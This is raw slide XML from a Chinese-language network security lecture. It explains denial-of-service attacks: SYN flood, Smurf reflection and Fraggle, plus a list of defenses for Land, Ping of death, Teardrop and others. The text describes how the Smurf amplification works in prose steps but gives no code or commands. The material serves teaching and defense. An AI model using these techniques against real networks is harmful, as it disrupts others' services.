              <a:off x="738188" y="6021313"/>
              <a:ext cx="1497012" cy="4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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>正常用户</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2447925" y="4827588"/>
            <a:ext cx="3921125" cy="922337"/>
            <a:chOff x="2447925" y="4827588"/>
            <a:chExt cx="3921125" cy="922337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36903" name="Group 1077"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2447925" y="4897438"/>
              <a:ext cx="3921125" cy="709612"/>
              <a:chOff x="1488" y="1776"/>
              <a:chExt cx="2496" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36905" name="AutoShape 107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6906" name="Text Box 1079"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1825" y="1921"/>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1600" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>正常</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>tcp connect</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36904" name="AutoShape 1080"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4586288" y="4827588"/>
              <a:ext cx="996950" cy="9223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000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 1081"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="3124200"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36901" name="Freeform 1082"/>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902" name="Text Box 1083"/>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7" name="Group 1084"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3276600"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36899" name="Freeform 1085"/>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900" name="Text Box 1086"/>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8" name="Group 1087"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36897" name="Freeform 1088"/>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8" name="Text Box 1089"/>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9" name="Group 1090"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2057400"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36895" name="Freeform 1091"/>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6" name="Text Box 1092"/>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0" name="Group 1093"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2209800"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36893" name="Freeform 1094"/>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4" name="Text Box 1095"/>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1" name="Group 1096"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2362200"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36891" name="Freeform 1097"/>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2" name="Text Box 1098"/>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2" name="Group 1099"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2514600"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36889" name="Freeform 1100"/>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0" name="Text Box 1101"/>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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SYN</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 1102"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3581400"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36887" name="Freeform 1103"/>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88" name="Text Box 1104"/>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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SYN/ACK</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 1106"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2362200"/>
            <a:ext cx="741363" cy="801688"/>
            <a:chOff x="3014" y="720"/>
            <a:chExt cx="467" cy="505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36884" name="Text Box 1107"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3014" y="937"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="36885" name="Text Box 1108"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="816"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="36886" name="Text Box 1109"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3312" y="72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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11477018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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53253"/>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1+#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2"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2"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5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="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53290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53290"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53290"/>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6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetID="10"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par>
                          <p:cTn id="68" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="7000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="2" presetClass="entr" presetSubtype="4"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par>
                          <p:cTn id="73" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="7500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="74" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="53255"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="5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90" grpId="0" animBg="1"/>
      <p:bldP spid="5325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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>找出网络中会回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Echo request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）的路由器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>广播地址发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器广播该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包到子网络中所有设备</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收到广播的设备同时向受害者应答（广播源地址）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP Echo-Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>受害者主机会被这些大量的应答包淹没</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300034" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（反射攻击）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF15334E-6EA9-4E71-B262-C00490E293C9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2510230350"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{726294F7-79F4-473C-A520-F1A38CB1F4C1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击示意图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="394240" name="Object 0"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998243222"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="35496" y="1052737"/>
          <a:ext cx="4608512" cy="3328760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s645747" name="位图图像" r:id="rId4" imgW="4219048" imgH="3048426" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="位图图像" r:id="rId4" imgW="4219048" imgH="3048426" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 4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052737"/>
                        <a:ext cx="4608512" cy="3328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291265227"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3775811" y="3950336"/>
          <a:ext cx="5368082" cy="2888769"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s645748" name="BMP 图象" r:id="rId6" imgW="4390476" imgH="2172003" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="BMP 图象" r:id="rId6" imgW="4390476" imgH="2172003" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 4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811" y="3950336"/>
                        <a:ext cx="5368082" cy="28887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61430322"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击类似，但它使用的不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，而是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Fraggle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击 </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175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312582385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77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补丁，加固协议栈，丢弃源、目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相同的包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ping of death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打补丁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙拦截</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Teardrop</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加入条件判断，对这种异常的包特殊处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打补丁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Smurf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拦截广播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拦截困难</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抗击打</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Fraggle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在防火墙上过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答消息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御</a:t>
            </a:r>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176</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1465659230"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由器和防火墙配置得当，可以减少受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的危险</a:t>
            </a:r>
          </a:p>
          <a:p>
